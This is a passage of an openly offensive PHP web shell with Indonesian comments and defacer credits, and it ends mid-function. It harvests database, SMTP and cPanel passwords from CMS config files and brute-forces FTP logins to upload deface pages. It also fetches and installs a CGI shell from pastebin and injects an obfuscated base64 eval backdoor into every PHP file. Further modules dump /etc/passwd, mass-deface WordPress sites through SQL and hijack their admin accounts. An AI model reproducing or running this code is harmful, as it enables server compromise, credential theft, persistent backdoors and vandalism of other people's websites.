  3225.             }
  3226.         }
  3227.         echo "</textarea><br>
  3228.         PASS: <br>
  3229.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  3230.         function cp_pass($dir) {
  3231.             $pass = "";
  3232.             $dira = scandir($dir);
  3233.             foreach($dira as $dirb) {
  3234.                 if(!is_file("$dir/$dirb")) continue;
  3235.                 $ambil = file_get_contents("$dir/$dirb");
  3236.                 if(preg_match("/WordPress/", $ambil)) {
  3237.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  3238.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  3239.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
  3240.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  3241.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  3242.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  3243.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
  3244.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  3245.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  3246.                 } elseif(preg_match("/client/", $ambil)) {
  3247.                     preg_match("/password=(.*)/", $ambil, $pass1);
  3248.                     if(preg_match('/"/', $pass1[1])) {
  3249.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  3250.                         $pass .= $pass1[1]."\n";
  3251.                     }
  3252.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  3253.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  3254.                 }
  3255.             }
  3256.             echo $pass;
  3257.         }
  3258.         $cp_pass = cp_pass($dir);
  3259.         echo $cp_pass;
  3260.         echo "</textarea><br>
  3261.         <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  3262.         </form>
  3263.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  3264.     }
  3265. } elseif($_GET['do'] == 'smtp') {
  3266.     echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  3267.     function scj($dir) {
  3268.         $dira = scandir($dir);
  3269.         foreach($dira as $dirb) {
  3270.             if(!is_file("$dir/$dirb")) continue;
  3271.             $ambil = file_get_contents("$dir/$dirb");
  3272.             $ambil = str_replace("$", "", $ambil);
  3273.             if(preg_match("/JConfig|joomla/", $ambil)) {
  3274.                 $smtp_host = ambilkata($ambil,"smtphost = '","'");
  3275.                 $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  3276.                 $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  3277.                 $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  3278.                 $smtp_port = ambilkata($ambil,"smtpport = '","'");
  3279.                 $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  3280.                 echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
  3281.                 echo "SMTP port: <font color=lime>$smtp_port</font><br>";
  3282.                 echo "SMTP user: <font color=lime>$smtp_user</font><br>";
  3283.                 echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
  3284.                 echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
  3285.                 echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
  3286.             }
  3287.         }
  3288.     }
  3289.     $smpt_hunter = scj($dir);
  3290.     echo $smpt_hunter;
  3291. } elseif($_GET['do'] == 'auto_wp') {
  3292.     if($_POST['hajar']) {
  3293.         $title = htmlspecialchars($_POST['new_title']);
  3294.         $pn_title = str_replace(" ", "-", $title);
  3295.         if($_POST['cek_edit'] == "Y") {
  3296.             $script = $_POST['edit_content'];
  3297.         } else {
  3298.             $script = $title;
  3299.         }
  3300.         $conf = $_POST['config_dir'];
  3301.         $scan_conf = scandir($conf);
  3302.         foreach($scan_conf as $file_conf) {
  3303.             if(!is_file("$conf/$file_conf")) continue;
  3304.             $config = file_get_contents("$conf/$file_conf");
  3305.             if(preg_match("/WordPress/", $config)) {
  3306.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
  3307.                 $dbuser = ambilkata($config,"DB_USER', '","'");
  3308.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3309.                 $dbname = ambilkata($config,"DB_NAME', '","'");
  3310.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
  3311.                 $prefix = $dbprefix."posts";
  3312.                 $option = $dbprefix."options";
  3313.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3314.                 $db = mysql_select_db($dbname);
  3315.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  3316.                 $result = mysql_fetch_array($q);
  3317.                 $id = $result[ID];
  3318.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3319.                 $result2 = mysql_fetch_array($q2);
  3320.                 $target = $result2[option_value];
  3321.                 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  3322.                 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  3323.                 echo "<div style='margin: 5px auto;'>";
  3324.                 if($target == '') {
  3325.                     echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
  3326.                 } else {
  3327.                     echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  3328.                 }
  3329.                 if(!$update OR !$conn OR !$db) {
  3330.                     echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  3331.                 } else {
  3332.                     echo "<font color=lime>sukses di ganti.</font><br>";
  3333.                 }
  3334.                 echo "</div>";
  3335.                 mysql_close($conn);
  3336.             }
  3337.         }
  3338.     } else {
  3339.         echo "<center>
  3340.         <h1>Auto Edit Title+Content WordPress</h1>
  3341.         <form method='post'>
  3342.         DIR Config: <br>
  3343.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  3344.         Set Title: <br>
  3345.         <input type='text' name='new_title' value='Hacked By Mr.ToKeiChun69' placeholder='New Title'><br><br>
  3346.         Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  3347.         <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  3348.         <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  3349.         <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
  3350.         </form>
  3351.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  3352.         ";
  3353.     }
  3354. } elseif($_GET['do'] == 'zoneh') {
  3355.     if($_POST['submit']) {
  3356.         $domain = explode("\r\n", $_POST['url']);
  3357.         $nick =  $_POST['nick'];
  3358.         echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  3359.         echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  3360.         function zoneh($url,$nick) {
  3361.             $ch = curl_init("http://www.zone-h.com/notify/single");
  3362.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  3363.                   curl_setopt($ch, CURLOPT_POST, true);
  3364.                   curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  3365.             return curl_exec($ch);
  3366.                   curl_close($ch);
  3367.         }
  3368.         foreach($domain as $url) {
  3369.             $zoneh = zoneh($url,$nick);
  3370.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  3371.                 echo "$url -> <font color=lime>OK</font><br>";
  3372.             } else {
  3373.                 echo "$url -> <font color=red>ERROR</font><br>";
  3374.             }
  3375.         }
  3376.     } else {
  3377.         echo "<center><form method='post'>
  3378.         <u>Defacer</u>: <br>
  3379.         <input type='text' name='nick' size='50' value='Mr.ToKeiChun69'><br>
  3380.         <u>Domains</u>: <br>
  3381.         <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  3382.         <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  3383.         </form>";
  3384.     }
  3385.     echo "</center>";
  3386. }elseif($_GET['do'] == 'cpftp_auto') {
  3387.     if($_POST['crack']) {
  3388.         $usercp = explode("\r\n", $_POST['user_cp']);
  3389.         $passcp = explode("\r\n", $_POST['pass_cp']);
  3390.         $i = 0;
  3391.         foreach($usercp as $ucp) {
  3392.             foreach($passcp as $pcp) {
  3393.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  3394.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  3395.                     } else {
  3396.                         $_SESSION[$ucp] = "1";
  3397.                         $_SESSION[$pcp] = "1";
  3398.                         if($ucp == '' || $pcp == '') {
  3399.                             //
  3400.                         } else {
  3401.                             echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  3402.                             $ftp_conn = ftp_connect(gethostbyname($_SERVER['HTTP_HOST']));
  3403.                             $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
  3404.                             if((!$ftp_login) || (!$ftp_conn)) {
  3405.                                 echo "[+] <font color=red>Login Gagal</font><br><br>";
  3406.                             } else {
  3407.                                 echo "[+] <font color=lime>Login Sukses</font><br>";
  3408.                                 $fi = htmlspecialchars($_POST['file_deface']);
  3409.                                 $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
  3410.                                 if($deface) {
  3411.                                     $i++;
  3412.                                     echo "[+] <font color=lime>Deface Sukses</font><br>";
  3413.                                     if(function_exists('posix_getpwuid')) {
  3414.                                         $domain_cp = file_get_contents("/etc/named.conf"); 
  3415.                                         if($domain_cp == '') {
  3416.                                             echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  3417.                                         } else {
  3418.                                             preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  3419.                                             foreach($domains_cp[1] as $dj) {
  3420.                                                 $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  3421.                                                 $user_cp_url = $user_cp_url['name'];
  3422.                                                 if($user_cp_url == $ucp) {
  3423.                                                     echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
  3424.                                                     break;
  3425.                                                 }
  3426.                                             }
  3427.                                         }
  3428.                                     } else {
  3429.                                         echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  3430.                                     }
  3431.                                 } else {
  3432.                                     echo "[-] <font color=red>Deface Gagal</font><br><br>";
  3433.                                 }
  3434.                             }
  3435.                             //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  3436.                         }
  3437.                     }
  3438.                 }
  3439.             }
  3440.         }
  3441.         if($i == 0) {
  3442.         } else {
  3443.             echo "<br>Sukses Deface ".$i." Cpanel by <font color=lime>Janchonx.</font>";
  3444.         }
  3445.     } else {
  3446.         echo "<center>
  3447.         <form method='post'>
  3448.         Filename: <br>
  3449.         <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
  3450.         Deface Page: <br>
  3451.         <input type='text' name='deface' placeholder='http://www.web-yang-udah-do-deface.com/filemu.php' style='width: 450px;'><br>
  3452.         USER: <br>
  3453.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  3454.         $_usercp = fopen("/etc/passwd","r");
  3455.         while($getu = fgets($_usercp)) {
  3456.             if($getu == '' || !$_usercp) {
  3457.                 echo "<font color=red>Can't read /etc/passwd</font>";
  3458.             } else {
  3459.                 preg_match_all("/(.*?):x:/", $getu, $u);
  3460.                 foreach($u[1] as $user_cp) {
  3461.                         if(is_dir("/home/$user_cp/public_html")) {
  3462.                             echo "$user_cp\n";
  3463.                     }
  3464.                 }
  3465.             }
  3466.         }
  3467.         echo "</textarea><br>
  3468.         PASS: <br>
  3469.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  3470.         function cp_pass($dir) {
  3471.             $pass = "";
  3472.             $dira = scandir($dir);
  3473.             foreach($dira as $dirb) {
  3474.                 if(!is_file("$dir/$dirb")) continue;
  3475.                 $ambil = file_get_contents("$dir/$dirb");
  3476.                 if(preg_match("/WordPress/", $ambil)) {
  3477.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  3478.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  3479.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
  3480.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  3481.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  3482.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  3483.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
  3484.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  3485.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  3486.                 } elseif(preg_match("/client/", $ambil)) {
  3487.                     preg_match("/password=(.*)/", $ambil, $pass1);
  3488.                     if(preg_match('/"/', $pass1[1])) {
  3489.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  3490.                         $pass .= $pass1[1]."\n";
  3491.                     }
  3492.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  3493.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  3494.                 }
  3495.             }
  3496.             echo $pass;
  3497.         }
  3498.         $cp_pass = cp_pass($dir);
  3499.         echo $cp_pass;
  3500.         echo "</textarea><br>
  3501.         <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
  3502.         </form>
  3503.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  3504.     }
  3505. }
  3506.  elseif($_GET['do'] == 'cgi') {
  3507.     $cgi_dir = mkdir('idx_cgi', 0755);
  3508.     $file_cgi = "idx_cgi/cgi.izo";
  3509.     $isi_htcgi = "AddHandler cgi-script .izo";
  3510.     $htcgi = fopen(".htaccess", "w");
  3511.     $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
  3512.     $cgi = fopen($file_cgi, "w");
  3513.     fwrite($cgi, $cgi_script);
  3514.     fwrite($htcgi, $isi_htcgi);
  3515.     chmod($file_cgi, 0755);
  3516.     echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  3517. } elseif($_GET['do'] == 'fake_root') {
  3518.     ob_start();
  3519.     function reverse($url) {
  3520.         $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  3521.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  3522.               curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket=");
  3523.               curl_setopt($ch, CURLOPT_HEADER, 0);
  3524.               curl_setopt($ch, CURLOPT_POST, 1);
  3525.         $resp = curl_exec($ch);
  3526.         $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  3527.         $array = explode(",,", $resp);
  3528.         unset($array[0]);
  3529.         foreach($array as $lnk) {
  3530.             $lnk = "http://$lnk";
  3531.             $lnk = str_replace(",", "", $lnk);
  3532.             echo $lnk."\n";
  3533.             ob_flush();
  3534.             flush();
  3535.         }
  3536.               curl_close($ch);
  3537.     }
  3538.     function cek($url) {
  3539.         $ch = curl_init($url);
  3540.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  3541.               curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  3542.         $resp = curl_exec($ch);
  3543.         return $resp;
  3544.     }
  3545.     $cwd = getcwd();
  3546.     $ambil_user = explode("/", $cwd);
  3547.     $user = $ambil_user[2];
  3548.     if($_POST['reverse']) {
  3549.         $site = explode("\r\n", $_POST['url']);
  3550.         $file = $_POST['file'];
  3551.         foreach($site as $url) {
  3552.             $cek = cek("$url/~$user/$file");
  3553.             if(preg_match("/hacked/i", $cek)) {
  3554.                 echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
  3555.             }
  3556.         }
  3557.     } else {
  3558.         echo "<center><form method='post'>
  3559.         Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  3560.         User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  3561.         Domain: <br>
  3562.         <textarea style='width: 450px; height: 250px;' name='url'>";
  3563.         reverse($_SERVER['HTTP_HOST']);
  3564.         echo "</textarea><br>
  3565.         <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
  3566.         </form><br>
  3567.         NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  3568.     }
  3569. } elseif($_GET['do'] == 'adminer') {
  3570.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  3571.     function adminer($url, $isi) {
  3572.         $fp = fopen($isi, "w");
  3573.         $ch = curl_init();
  3574.               curl_setopt($ch, CURLOPT_URL, $url);
  3575.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  3576.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  3577.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  3578.               curl_setopt($ch, CURLOPT_FILE, $fp);
  3579.         return curl_exec($ch);
  3580.               curl_close($ch);
  3581.         fclose($fp);
  3582.         ob_flush();
  3583.         flush();
  3584.     }
  3585.     if(file_exists('adminer.php')) {
  3586.         echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  3587.     } else {
  3588.         if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  3589.             echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  3590.         } else {
  3591.             echo "<center><font color=red>gagal buat file adminer</font></center>";
  3592.         }
  3593.     }
  3594. }elseif($_GET['do'] == 'injectcode') {?><center>
  3595.         <form method='POST'>
  3596.         <table>
  3597.         <tr>
  3598.             <td width="100" class="title">
  3599.                         Directory
  3600.                     </td>
  3601.                     <td>
  3602.                          <input type='text' style="width: 400px;" name="pathtomass" value="<?php echo getcwd().$SEPARATOR; ?>" />
  3603.                     </td>
  3604.                    
  3605.                 </tr>
  3606.                 <tr>
  3607.                 <td class="title">
  3608.                     Mode
  3609.                 </td>
  3610.                 <td>
  3611.                         <select style="width: 400px;" name="mode" class="box">
  3612.                             <option value="Apender">Apender</option>
  3613.                             <option value="Overwriter">Overwriter</option>
  3614.                         </select>
  3615.                 </td>
  3616.                 </tr>
  3617.                 <tr>
  3618.                     <td class="title">
  3619.                         File Type
  3620.                     </td>
  3621.                     <td>
  3622.                         <input type="text" class="box" name="filetype" value="php" onBlur="if(this.value=='')this.value='php';" />
  3623.                     </td>
  3624.                 </tr>
  3625.                 <tr>
  3626.             <td>Create A backdoor by injecting this code in every php file of current directory</td>
  3627.         </tr>
  3628.                
  3629.                 <tr>
  3630.                     <td colspan="2">
  3631.                         <textarea name="injectthis" cols="110" rows="10" class="box"><?php echo base64_decode("PD9waHANCmV2YWwoZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoInkwelRVSWwzZHcySlZrcFVpdFdzVGkxTHpORklyOHJNUzh0SkxFblZTRW9zVGpVemlVOUpUYzVQU2RWSXk4eEpqVTlQTFlsUHpzOHJTYzByS2RaUXlpZ3BLYkRTMXk5SUxDNUpUY3JNMDB2T3o5VXZTaXpYVC9VemN5d3NUTXhXMGdRQzYxb0EiKSkpOw0KPz4="); ?></textarea>
  3632.                     </td>
  3633.                 </tr>
  3634.                 <tr>
  3635.                     <td rowspan="2">
  3636.                         <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="submit" class="but" value="Inject "/>
  3637.                     </td>
  3638.                 </tr>
  3639.         </form>
  3640.         </table><div id="showinject"</div> <?php
  3641. $filetype = $_POST['filetype'];
  3642. $mode = "a";
  3643. if($_POST['mode'] == 'Apender')
  3644. $mode = "a";
  3645.  if($_POST['mode'] == 'Overwriter')
  3646. $mode = "w";
  3647. if (is_dir($_POST['pathtomass']))
  3648. {
  3649. $lolinject = $_POST['injectthis'];
  3650. $mypath = $_POST['pathtomass'] .$directorysperator. "*.".$filetype;
  3651. if(substr($_POST['pathtomass'], -1) == "\\")
  3652. $mypath = $_POST['pathtomass'] . "*.".$filetype;
  3653. foreach (glob($mypath) as $injectj00)
  3654. {
  3655. if($injectj00 == __FILE__)
  3656. continue;
  3657. $fp=fopen($injectj00,$mode);
  3658. if (fputs($fp,$lolinject))
  3659. echo '<br><font class=txt size=3>'.$injectj00.' was injected<br></font>';
  3660. else
  3661. echo 'failed to inject '.$injectj00.'<br>';
  3662. }
  3663. }
  3664. else
  3665. echo '<b>'.$_POST['pathtomass'].' is not available!</b>';
  3666. }
  3667.  
  3668. elseif($_GET['do'] == 'passwbypass') {
  3669.     echo '<center>Bypass etc/passw With:<br>
  3670. <table style="width:50%">
  3671.   <tr>
  3672.     <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
  3673.     <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
  3674.     <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>  
  3675.     <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>      
  3676.     <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="melex"></form></td>
  3677. </tr></table>Bypass User With : <table style="width:50%">
  3678. <tr>
  3679.     <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
  3680.     <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
  3681.     <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>  
  3682.     <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>      
  3683.     <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
  3684. </tr>
  3685. </table><br>';
  3686.  
  3687.  
  3688. if ($_POST['awkuser']) {
  3689. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3690. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
  3691. echo "</textarea><br>";
  3692. }
  3693. if ($_POST['systuser']) {
  3694. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3695. echo system("ls /var/mail");
  3696. echo "</textarea><br>";
  3697. }
  3698. if ($_POST['passthuser']) {
  3699. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3700. echo passthru("ls /var/mail");
  3701. echo "</textarea><br>";
  3702. }
  3703. if ($_POST['exuser']) {
  3704. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3705. echo exec("ls /var/mail");
  3706. echo "</textarea><br>";
  3707. }
  3708. if ($_POST['shexuser']) {
  3709. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3710. echo shell_exec("ls /var/mail");
  3711. echo "</textarea><br>";
  3712. }
  3713. if($_POST['syst'])
  3714. {
  3715. echo"<textarea class='inputz' cols='65' rows='15'>";
  3716. echo system("cat /etc/passwd");
  3717. echo"</textarea><br><br><b></b><br>";
  3718. }
  3719. if($_POST['passth'])
  3720. {
  3721. echo"<textarea class='inputz' cols='65' rows='15'>";
  3722. echo passthru("cat /etc/passwd");
  3723. echo"</textarea><br><br><b></b><br>";
  3724. }
  3725. if($_POST['ex'])
  3726. {
  3727. echo"<textarea class='inputz' cols='65' rows='15'>";
  3728. echo exec("cat /etc/passwd");
  3729. echo"</textarea><br><br><b></b><br>";
  3730. }
  3731. if($_POST['shex'])
  3732. {
  3733. echo"<textarea class='inputz' cols='65' rows='15'>";
  3734. echo shell_exec("cat /etc/passwd");
  3735. echo"</textarea><br><br><b></b><br>";
  3736. }
  3737. echo '<center>';
  3738. if($_POST['melex'])
  3739. {
  3740. echo"<textarea class='inputz' cols='65' rows='15'>";
  3741. for($uid=0;$uid<60000;$uid++){
  3742. $ara = posix_getpwuid($uid);
  3743. if (!empty($ara)) {
  3744. while (list ($key, $val) = each($ara)){
  3745. print "$val:";
  3746. }
  3747. print "\n";
  3748. }
  3749. }
  3750. echo"</textarea><br><br>";
  3751. }
  3752. //
  3753.  
  3754. //
  3755. } elseif($_GET['do'] == 'auto_dwp') {
  3756.     if($_POST['auto_deface_wp']) {
  3757.         function anucurl($sites) {
  3758.             $ch = curl_init($sites);
  3759.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3760.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3761.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3762.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  3763.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3764.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3765.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3766.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3767.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3768.             $data = curl_exec($ch);
  3769.                   curl_close($ch);
  3770.             return $data;
  3771.         }
  3772.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  3773.             $post = array(
  3774.                    "log" => "$userr",
  3775.                    "pwd" => "$pass",
  3776.                    "rememberme" => "forever",
  3777.                    "wp-submit" => "$wp_submit",
  3778.                    "redirect_to" => "$web",
  3779.                    "testcookie" => "1",
  3780.                    );
  3781.             $ch = curl_init($cek);
  3782.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3783.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3784.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3785.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3786.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3787.                   curl_setopt($ch, CURLOPT_POST, 1);
  3788.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  3789.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3790.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3791.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3792.             $data = curl_exec($ch);
  3793.                   curl_close($ch);
  3794.             return $data;
  3795.         }
  3796.         $scan = $_POST['link_config'];
  3797.         $link_config = scandir($scan);
  3798.         $script = htmlspecialchars($_POST['script']);
  3799.         $user = "faisa69";
  3800.         $pass = "faisa69";
  3801.         $passx = md5($pass);
  3802.         foreach($link_config as $dir_config) {
  3803.             if(!is_file("$scan/$dir_config")) continue;
  3804.             $config = file_get_contents("$scan/$dir_config");
  3805.             if(preg_match("/WordPress/", $config)) {
  3806.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
  3807.                 $dbuser = ambilkata($config,"DB_USER', '","'");
  3808.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3809.                 $dbname = ambilkata($config,"DB_NAME', '","'");
  3810.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
  3811.                 $prefix = $dbprefix."users";
  3812.                 $option = $dbprefix."options";
  3813.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3814.                 $db = mysql_select_db($dbname);
  3815.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3816.                 $result = mysql_fetch_array($q);
  3817.                 $id = $result[ID];
  3818.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3819.                 $result2 = mysql_fetch_array($q2);
  3820.                 $target = $result2[option_value];
  3821.                 if($target == '') {                
  3822.                     echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  3823.                 } else {
  3824.                     echo "[+] $target <br>";
  3825.                 }
  3826.                 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  3827.                 if(!$conn OR !$db OR !$update) {
  3828.                     echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  3829.                     mysql_close($conn);
  3830.                 } else {
  3831.                     $site = "$target/wp-login.php";
  3832.                     $site2 = "$target/wp-admin/theme-install.php?upload";
  3833.                     $b1 = anucurl($site2);
  3834.                     $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  3835.                     $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  3836.                     $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
